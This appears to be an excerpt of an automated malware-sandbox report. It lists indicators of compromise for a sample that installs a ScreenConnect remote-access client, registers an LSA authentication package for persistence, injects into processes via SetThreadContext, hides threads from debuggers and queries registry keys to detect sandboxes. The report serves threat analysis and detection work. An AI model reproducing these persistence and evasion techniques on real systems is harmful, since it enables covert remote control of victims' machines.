T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\kf2lmfyx.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\kf2lmfyx.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
224	2N2602.exe
348	3P97i.exe
5264	bgUvqLl.exe
6516	Y9WG5Ep.exe
1312	E3WGlpL.exe
58912	Process not Found
80908	Process not Found
99872	Process not Found
167500	Process not Found
179524	Process not Found
10356	Process not Found
11004	Process not Found
12220	Process not Found

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 4692 set thread context of 468	4692	q3na5Mc.exe	122
PID 1344 set thread context of 5108	1344	42cec0179c.exe	198
PID 5848 set thread context of 2540	5848	6NPpGdC.exe	481
PID 6940 set thread context of 456	6940	imfsCjY.exe	495
PID 37188 set thread context of 37624	37188	Process not Found	4438
PID 68292 set thread context of 68368	68292	Process not Found	8366
PID 109732 set thread context of 110132	109732	Process not Found	13527
PID 129000 set thread context of 129072	129000	Process not Found	15911
PID 153444 set thread context of 153688	153444	Process not Found	18981
PID 167500 set thread context of 168260	167500	Process not Found	23976
PID 10356 set thread context of 11172	10356	Process not Found	24029
PID 11336 set thread context of 11352	11336	Process not Found	24031

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config	msiexec.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	Process not Found
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log	Process not Found
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources	msiexec.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Installer\e5b8663.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI87EA.tmp	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	1J19x2.exe
File created	C:\Windows\Installer\e5b8663.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI87CA.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7F4C.tmp	msiexec.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI88A7.tmp	msiexec.exe
File created	C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7FCA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{933D173F-6496-0F7D-53C4-FF46268B901A}	msiexec.exe
File created	C:\Windows\Installer\e5b8665.msi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
4748	4692	WerFault.exe	120
3936	1344	WerFault.exe	197
1736	348	WerFault.exe	121
3176	5848	WerFault.exe	480
2064	6940	WerFault.exe	494
37764	37188	Process not Found
68464	68292	Process not Found	8360
110328	109732	Process not Found
129224	129000	Process not Found
153852	153444	Process not Found
194136	6708	Process not Found	507
11488	11336	Process not Found	24030

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C4O51.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3P97i.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	67e0HNq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mpc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	imfsCjY.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bgUvqLl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	imfsCjY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1J19x2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBUN8fn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2N2602.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	42cec0179c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6NPpGdC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	E3WGlpL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mpc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dyshh8M.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000ccfa03f2361de63d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001071020000000000c01200000000ffffffff000000002701010000883801ccfa03f20000000000001071020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d083020000000000c050e1000000ffffffff000000000700010000e84101ccfa03f2000000000000d08302000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090d4e30000000000000005000000ffffffff00000000070001000048ea71ccfa03f200000000000090d4e300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000ccfa03f200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	q3na5Mc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3P97i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	q3na5Mc.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3P97i.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Delays execution with timeout.exe 4 IoCs

pid	Process
2732	timeout.exe
13476	Process not Found
60588	Process not Found
12508	Process not Found

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
